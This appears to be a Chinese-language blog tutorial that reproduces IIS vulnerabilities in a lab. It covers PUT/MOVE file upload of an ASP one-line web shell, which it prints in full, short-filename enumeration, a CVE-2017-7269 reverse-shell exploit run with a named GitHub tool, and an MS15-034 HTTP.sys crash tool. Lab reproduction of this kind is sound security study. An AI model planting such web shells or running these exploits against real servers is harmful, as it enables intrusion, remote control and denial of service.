IIS漏洞再现

一、IIS任意文件上传漏洞

1、安装Windows2003

2、设置

3、浏览访问Windows2003的IP

访问成功

4、抓包,上传木马

注意里面的PUT和MOVE都必须是大写

在当前页抓包用PUT方式上传一个1.txt文件,内容是木马

<%eval request("cmd")%>

可以看到201上传成功

接下来把1.txt的内容移动到IP下的1.asp

访问木马

成功访问到

5、用蚁剑测试连接

二、IIS短文件漏洞

1、原理

当后缀小于4时,短文件名产生需要文件(夹)名前缀字符长度大于等于9位

当后缀大于等于4时,文件名前缀字符长度即使为1,也会产生短文件名

2、特征

(1)只显示前6位的字符,后续字符用~1代替。其中数字1是可以递增。如果存在文件名类似的文件,则前面的 6个字符是相同的,后面的数字进行递增

(2)后缀名最长只有3位,超过3位的会生成短文件名,且后缀多余的部分会截断。

(3)所有小写字母都会转换成大写字母

(4)长文件名中包含多个"."的时候,以文件最后一个"."作为短文件名的后缀

(5)长文件名前缀/文件夹名字符长度符合0-9和A-Z、a-z范围且需要大于等于9位才会生成短文件名,如果包含空格或者其他部分特殊字符,不论长度均会生成短文件。

3、验证

在win2003的网站目录下新建一个长文件名abcdefghijk.txt,内容写上123

在本机浏览器测试我们刚刚创建的文件,如果是404,则说明存在此短文件名

首先*~1*肯定存在,因为*代表任意位数的字符,在这里表示前六位字符

当我们访问*a~1*时,没返回404,说明不存在这个短文件,因为我们的文件名设置的是abcdefghijk.txt,第一个字符是a

当我们访问a*~1*时,返回404,说明存在,而这也和我们创建的文件名相对应

以此类推就能推测出短文件名

短文件漏洞就是这样用的

三、IIS RCE-CVE-2017-7269

1、在kali上传一个工具

地址:GitHub - g0rx/iis6-exploit-2017-CVE-2017-7269: iis6 exploit 2017 CVE-2017-7269

2、运行工具

用python2运行

python2 文件的绝对路径 要攻击的地址 端口 反弹到哪里的地址 端口

3、再开一个终端,监听我们刚刚开的端口

4、反弹shell成功

5、执行命令

四、HTTP.SYS远程代码执执漏洞

1、打开Windows server2012

2、访问IP

3、下载工具

在kali下载工具,地址:https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC

4、使用工具

cd 进入工具

运行工具

接下来工具要什么我们给什么

第一个是要攻击目标的IP

第二个是要端口

第三个是要攻击目标的路径里有的文件

而我们攻击的目标只能访问到一个图片,不知道他的路径,那么就在网页上点鼠标右键,复制图像链接,粘贴出来就可以看到了

继续运行

返回Windows2012看一下

刚刚已经把我的Windows2012打关机了,这是自动开机以后得状态

5、这样就成功了

相关推荐
vegetable\chicken36 分钟前
ENSP学习day11
运维·网络·学习
AndrewPerfect1 小时前
怎么使用pm2启动和暂停后端程序(后端架构nodejs+koa)
linux·运维·服务器
路由侠内网穿透1 小时前
本地部署仓库管理工具 Gitlab 并实现外部访问
linux·运维·服务器·网络协议·tcp/ip·gitlab
抓哇小菜鸡1 小时前
nginx
运维·nginx·dubbo
T0uken2 小时前
【C++】httplib:轻量级的 HTTP 服务器和客户端
服务器·c++·http
会会会一飞冲天的小慧猪~ ~ ~2 小时前
基于网启PXE服务器的批量定制系统平台(详细版)
运维·服务器
门前灯2 小时前
部分 Bash 内置命令的详解
linux·运维·bash
下海的alpha3 小时前
基于云服务器的数仓搭建-hive/spark安装
服务器·hive·spark
靠近彗星4 小时前
HBase在Hadoop平台上的安装和配置
运维·debian
小码本码4 小时前
运维工程师学习知识总结
linux·运维